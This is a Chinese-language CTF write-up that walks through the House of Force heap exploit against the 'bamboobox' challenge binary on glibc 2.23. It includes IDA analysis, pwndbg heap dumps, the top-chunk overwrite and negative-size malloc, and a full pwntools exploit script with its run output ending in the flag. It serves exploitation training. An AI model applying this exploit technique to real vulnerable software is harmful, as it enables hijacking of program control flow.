House Of Force(控制top_chunk)(例题)

附件下载:

链接:https://pan.baidu.com/s/1DTAyDvfJ9Ri3um6-zxtaBw
提取码:xv72
–来自百度网盘超级会员V3的分享

实验坏境

看一下linux环境:

image-20230810163845345

image-20230810111830705

Ubuntu版本为16.04,libc版本为2.23。

再检查一下文件的保护情况:

image-20230810164044355

IDA静态分析

将文件载入ida,分析下程序流程。

main函数

image-20230810164301393

main函数就是程序的总体流程,需要注意的是程序在开头就申请了一片堆区用来存储hello_message和goodbay_message,并且在程序开始时调用hello_message,程序结束时调用goodbay_message。

image-20230810170608688

程序菜单函数。

1、show_item函数

image-20230810170754804

首先判断存放于bss段的全局变量num是否有数据,然后进入循环打印程序各个结构体的内容。

2、add_item函数

为程序添加结构体的内容:

image-20230810171439731

3、change_item函数

image-20230810171943471

漏洞函数:实现任意堆溢出

4、remove_item函数

image-20230810172110068

magic函数(target)

image-20230810172144610

我们的目标就是篡改程序流执行这个函数。

pwngdb动态调试

堆内存分布

创建两个堆块

chunk0:size=10,content=’aaaaa’

chunk1:size=20,content=’bbbbb’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
pwndbg> r
Starting program: /root/CTF-PWN/House Of Force/PWN 
There is a box with magic
what do you want to do in the box
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:2
Please enter the length of item name:10
Please enter the name of item:aaaaa
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:2
Please enter the length of item name:20
Please enter the name of item:bbbbb
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04360 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84	../sysdeps/unix/syscall-template.S: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────
 RAX  0xfffffffffffffe00
 RBX  0x0
 RCX  0x7ffff7b04360 (__read_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x8
 RDI  0x0
 RSI  0x7fffffffded0 —▸ 0x7fffffff0a32 ◂— 0x0
 R8   0x7ffff7fdd700 ◂— 0x7ffff7fdd700
 R9   0xc
 R10  0x0
 R11  0x246
 R12  0x4007a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdfc0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffdee0 —▸ 0x400ee0 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffdeb8 —▸ 0x400e5d (main+166) ◂— lea    rax, [rbp - 0x10]
 RIP  0x7ffff7b04360 (__read_nocancel+7) ◂— cmp    rax, -0xfff
───────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────
0x7ffff7b04360 <__read_nocancel+7>     cmp    rax, -0xfff
   0x7ffff7b04366 <__read_nocancel+13>    jae    read+73 <0x7ffff7b04399>

   0x7ffff7b04399 <read+73>               mov    rcx, qword ptr [rip + 0x2ccad8]
   0x7ffff7b043a0 <read+80>               neg    eax
   0x7ffff7b043a2 <read+82>               mov    dword ptr fs:[rcx], eax
   0x7ffff7b043a5 <read+85>               or     rax, 0xffffffffffffffff
   0x7ffff7b043a9 <read+89>               ret    
 
   0x7ffff7b043aa                         nop    word ptr [rax + rax]
   0x7ffff7b043b0 <write>                 cmp    dword ptr [rip + 0x2d2389], 0 <0x7ffff7dd6740>
   0x7ffff7b043b7 <write+7>               jne    write+25 <0x7ffff7b043c9>

   0x7ffff7b043c9 <write+25>              sub    rsp, 8
───────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffdeb8 —▸ 0x400e5d (main+166) ◂— lea    rax, [rbp - 0x10]
01:00080x7fffffffdec0 ◂— 0x200400ee0
02:00100x7fffffffdec8 —▸ 0x603010 —▸ 0x400896 (hello_message) ◂— push   rbp
03:0018│ rsi  0x7fffffffded0 —▸ 0x7fffffff0a32 ◂— 0x0
04:00200x7fffffffded8 ◂— 0x9478adcd5746ce00
05:0028│ rbp  0x7fffffffdee0 —▸ 0x400ee0 (__libc_csu_init) ◂— push   r15
06:00300x7fffffffdee8 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax
07:00380x7fffffffdef0 ◂— 0x0
─────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7b04360 __read_nocancel+7
   f 1           400e5d main+166
   f 2     7ffff7a2d840 __libc_start_main+240

然后看一下堆的情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
pwndbg> heap
0x603000 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0x400896 <hello_message>, 
  bk = 0x4008b1 <goodbye_message>, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x603020 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0xa6161616161, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x603040 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0xa6262626262, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x20fa1
}
0x603060 PREV_INUSE {
  prev_size = 0, 
  size = 135073, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

看一下堆区内存情况:

1
2
3
4
5
6
7
8
9
pwndbg> x/16gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x00000000004008b1
0x603020:	0x0000000000000000	0x0000000000000021	#chunk0
0x603030:	0x00000a6161616161	0x0000000000000000
0x603040:	0x0000000000000000	0x0000000000000021	#chunk1
0x603050:	0x00000a6262626262	0x0000000000000000
0x603060:	0x0000000000000000	0x0000000000020fa1	#top_chunk
0x603070:	0x0000000000000000	0x0000000000000000

func_start_malloc_chunk处的堆块就是程序一开始就向内存申请的空间,看一下ida中malloc_data的地址

image-20230810173703801

1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/16gx 0x0000000000400896
0x400896 <hello_message>:	0x400f68bfe5894855	0x88bffffffe3ce800
    						#hello_message的汇编代码
0x4008a6 <hello_message+16>:	0xfffffe32e800400f	0xbfe5894855c35d90
0x4008b6 <goodbye_message+5>:	0xfffe21e800400faa	0x17e800400fbcbfff
    							#goodbye_message的汇编代码
0x4008c6 <goodbye_message+21>:	0x4855c35d90fffffe	0xe800400fc7bfe589
0x4008d6 <menu+10>:	0x400fe4bffffffe06	0xc7bffffffdfce800
0x4008e6 <menu+26>:	0xfffffdf2e800400f	0xfde8e800400ff3bf
0x4008f6 <menu+42>:	0xe80040100fbfffff	0x401020bffffffdde
0x400906 <menu+58>:	0x3dbffffffdd4e800	0xfffffdcae8004010

所以堆区的内存情况:

1
2
3
4
5
6
7
8
9
10
pwndbg> x/16gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x00000000004008b1
    		#hello_message		#goodbye_message
0x603020:	0x0000000000000000	0x0000000000000021	#chunk0
0x603030:	0x00000a6161616161	0x0000000000000000
0x603040:	0x0000000000000000	0x0000000000000021	#chunk1
0x603050:	0x00000a6262626262	0x0000000000000000
0x603060:	0x0000000000000000	0x0000000000020fa1	#top_chunk
0x603070:	0x0000000000000000	0x0000000000000000

bss段的全局变量

结合IDA看一下bss段的全局变量:

image-20230810174406916

image-20230810174424034

num记录的是堆块的数量。

image-20230810174526872

1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> x/16gx 0x6020c0
0x6020c0 <itemlist>:	0x000000000000000a	0x0000000000603030
    					#struct_size		#struct_content_ptr
0x6020d0 <itemlist+16>:	0x0000000000000014	0x0000000000603050
        				#struct_size		#struct_content_ptr
0x6020e0 <itemlist+32>:	0x0000000000000000	0x0000000000000000
0x6020f0 <itemlist+48>:	0x0000000000000000	0x0000000000000000
0x602100 <itemlist+64>:	0x0000000000000000	0x0000000000000000
0x602110 <itemlist+80>:	0x0000000000000000	0x0000000000000000
0x602120 <itemlist+96>:	0x0000000000000000	0x0000000000000000
0x602130 <itemlist+112>:	0x0000000000000000	0x0000000000000000
//注意struct_content_ptr指向malloc出来malloc_data的地址

itemlist存放着程序的结构体

攻击原理

我们的目标是修改堆中的0x4008b1(goodbye_message)为magic函数地址:

1
2
3
4
5
6
7
8
9
10
11
修改前:
pwndbg> x/16gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x00000000004008b1
    		#hello_message		#goodbye_message
    		
修改后:
pwndbg> x/16gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x0000000000400d49
    		#hello_message		#magic函数

自动化执行程序功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def cmd(choice):
  p.sendlineafter('',str(choice))
  
def create(size,content):
  cmd(2)
  p.sendlineafter('item name:',str(size))
  p.sendlineafter('item:',content)

def edit(index,size,content):
  cmd(3)
  p.sendlineafter('of item:',str(index))
  p.sendlineafter('item name:',str(size))
  p.sendlineafter('the item:',content)

def delete(index):
  cmd(4)
  p.sendlineafter('of item:',str(index))

def quit():
  cmd(5)

接下来:

1
creat(0x30,"aaaa")

gdb时程序的内存分布如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x402000 r-xp     2000 0      
          0x601000           0x602000 r--p     1000 1000   
          0x602000           0x603000 rw-p     1000 2000   
          0x603000           0x624000 rw-p    21000 0      [heap]
    0x7ffff7a0d000     0x7ffff7bcd000 r-xp   1c0000 0      /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
    0x7ffff7dd3000     0x7ffff7dd7000 rw-p     4000 0      
    0x7ffff7dd7000     0x7ffff7dfd000 r-xp    26000 0      /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7fdc000     0x7ffff7fdf000 rw-p     3000 0      
    0x7ffff7ff7000     0x7ffff7ffa000 r--p     3000 0      [vvar]
    0x7ffff7ffa000     0x7ffff7ffc000 r-xp     2000 0      [vdso]
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000 25000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000 26000  /lib/x86_64-linux-gnu/ld-2.23.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000 0      
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]
0xffffffffff600000 0xffffffffff601000 r-xp     1000 0      [vsyscall]

执行完上面的payload之后堆块的状况如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> x/30gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x00000000004008b1
			#hello_message		#goodbye_message
0x603020:	0x0000000000000000	0x0000000000000041	#chunk0(malloc(0xx30))
0x603030:	0x0000000a61616161	0x0000000000000000
0x603040:	0x0000000000000000	0x0000000000000000
0x603050:	0x0000000000000000	0x0000000000000000
0x603060:	0x0000000000000000	0x0000000000020fa1	#top_chunk
0x603070:	0x0000000000000000	0x0000000000000000
0x603080:	0x0000000000000000	0x0000000000000000
0x603090:	0x0000000000000000	0x0000000000000000
0x6030a0:	0x0000000000000000	0x0000000000000000
0x6030b0:	0x0000000000000000	0x0000000000000000
0x6030c0:	0x0000000000000000	0x0000000000000000
0x6030d0:	0x0000000000000000	0x0000000000000000
0x6030e0:	0x0000000000000000	0x0000000000000000

然后编辑刚才创建的堆块:

1
2
content='a'*0x30+'1'*8+p64(0xffffffffffffffff)
edit(0,0x40,content)

再看一下堆块的情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> x/30gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#func_start_malloc_chunk
0x603010:	0x0000000000400896	0x00000000004008b1
			#hello_message		#goodbye_message
0x603020:	0x0000000000000000	0x0000000000000039	#chunk0(malloc(0xx30))
0x603030:	0x6161616161616161	0x6161616161616161
0x603040:	0x6161616161616161	0x6161616161616161
0x603050:	0x6161616161616161	0x6161616161616161
0x603060:	0x3131313131313131	0xffffffffffffffff	#top_chunk
0x603070:	0x0000000000000000	0x0000000000000000
0x603080:	0x0000000000000000	0x0000000000000000
0x603090:	0x0000000000000000	0x0000000000000000
0x6030a0:	0x0000000000000000	0x0000000000000000
0x6030b0:	0x0000000000000000	0x0000000000000000
0x6030c0:	0x0000000000000000	0x0000000000000000
0x6030d0:	0x0000000000000000	0x0000000000000000
0x6030e0:	0x0000000000000000	0x0000000000000000

可以看到,top_chunk的size已经被更改为0xffffffffffffffff,利用它我们就可以控制任意内存的地址。

接着执行:

1
2
offset=-0x60-0x10
create(offset,'1234')

这个offest就是new_top_chunk_addr - old_top_chunk_addr - 0x10

即0x603000-0x603060-0x10=-0x70

这就是利用HOF向前控制内存。执行了这一步骤的话,top_chunk指向0x603000,这样下此分配chunk时,就可以分配到goodbye_message处的内存了。

1
2
3
4
5
6
7
8
9
10
pwndbg> x/30gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#new_top_chunk
0x603010:	0x0000000000400d49	0x0000000000400d49
			#hello_message		#goodbye_message
0x603020:	0x0000000000000000	0x0000000000000039	#chunk0(malloc(0xx30))
0x603030:	0x6161616161616161	0x6161616161616161
0x603040:	0x6161616161616161	0x6161616161616161
0x603050:	0x6161616161616161	0x6161616161616161
0x603060:	0x3131313131313131	0xffffffffffffffa1	#old_top_chunk
0x603070:	0x0000000000000000	0x0000000000000000

此时我们已经可以控制goodbye_message的地址了,覆盖后退出程序就可以触发magic函数。

1
2
3
create(0x10,p64(magic)*2)
#gdb.attach(p)
#quit()
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/30gx 0x603000
0x603000:	0x0000000000000000	0x0000000000000021	#现在已经被控制的chunk
0x603010:	0x0000000000400d49	0x0000000000400d49
			#magic				#magic
0x603020:	0x0000000000000000	0x0000000000000039	#chunk0(malloc(0xx30))
0x603030:	0x6161616161616161	0x6161616161616161
0x603040:	0x6161616161616161	0x6161616161616161
0x603050:	0x6161616161616161	0x6161616161616161
0x603060:	0x3131313131313131	0xffffffffffffffa1	#top_chunk
0x603070:	0x0000000000000000	0x0000000000000000
0x603080:	0x0000000000000000	0x0000000000000000

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
context.log_level = 'debug'
p = process('./PWN')

def cmd(choice):
  p.sendlineafter('',str(choice))
  
def create(size,content):
  cmd(2)
  p.sendlineafter('item name:',str(size))
  p.sendlineafter('item:',content)

def edit(index,size,content):
  cmd(3)
  p.sendlineafter('of item:',str(index))
  p.sendlineafter('item name:',str(size))
  p.sendlineafter('the item:',content)

def delete(index):
  cmd(4)
  p.sendlineafter('of item:',str(index))

def quit():
  cmd(5)

magic = 0x400d49
create(0x30, "aaaa")
content='a'*0x30+'1'*8+p64(0xffffffffffffffff)
edit(0,0x40,content)
offset=-0x60-0x10
create(offset,'1234')
create(0x10,p64(magic)*2)
#gdb.attach(p)
quit()
p.interactive()

debug-exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
root@ubuntu:~/CTF-PWN/House Of Force# python exp.py
[+] Starting local process './PWN': pid 23325
[DEBUG] Received 0x11c bytes:
    'There is a box with magic\n'
    'what do you want to do in the box\n'
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x25 bytes:
    'Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
    '48\n'
[DEBUG] Received 0x1e bytes:
    'Please enter the name of item:'
[DEBUG] Sent 0x5 bytes:
    'aaaa\n'
[DEBUG] Received 0xe0 bytes:
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:'
[DEBUG] Sent 0x2 bytes:
    '3\n'
[DEBUG] Received 0x1f bytes:
    'Please enter the index of item:'
[DEBUG] Sent 0x2 bytes:
    '0\n'
[DEBUG] Received 0x25 bytes:
    'Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
    '64\n'
[DEBUG] Received 0x26 bytes:
    'Please enter the new name of the item:'
[DEBUG] Sent 0x41 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000030  31 31 31 31  31 31 31 31  ff ff ff ff  ff ff ff ff  │1111│1111│····│····│
    00000040  0a                                                  │·│
    00000041
[DEBUG] Received 0x1d2 bytes:
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:invaild choice!!!\n'
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x25 bytes:
    'Please enter the length of item name:'
[DEBUG] Sent 0x5 bytes:
    '-112\n'
[DEBUG] Received 0xfe bytes:
    'Please enter the name of item:----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:'
[DEBUG] Sent 0x5 bytes:
    '1234\n'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x117 bytes:
    'invaild choice!!!\n'
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:Please enter the length of item name:'
[DEBUG] Sent 0x3 bytes:
    '16\n'
[DEBUG] Received 0x1e bytes:
    'Please enter the name of item:'
[DEBUG] Sent 0x11 bytes:
    00000000  49 0d 40 00  00 00 00 00  49 0d 40 00  00 00 00 00  │I·@·│····│I·@·│····│
    00000010  0a                                                  │·│
    00000011
[DEBUG] Received 0x1d2 bytes:
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:invaild choice!!!\n'
    '----------------------------\n'
    'Bamboobox Menu\n'
    '----------------------------\n'
    '1.show the items in the box\n'
    '2.add a new item\n'
    '3.change the item in the box\n'
    '4.remove the item in the box\n'
    '5.exit\n'
    '----------------------------\n'
    'Your choice:'
[DEBUG] Sent 0x2 bytes:
    '5\n'
[*] Switching to interactive mode
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:invaild choice!!!
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:[*] Process './PWN' stopped with exit code 0 (pid 23325)
[DEBUG] Received 0x15 bytes:
    'flag{house_of_force}\n'
flag{house_of_force}
[*] Got EOF while reading in interactive
$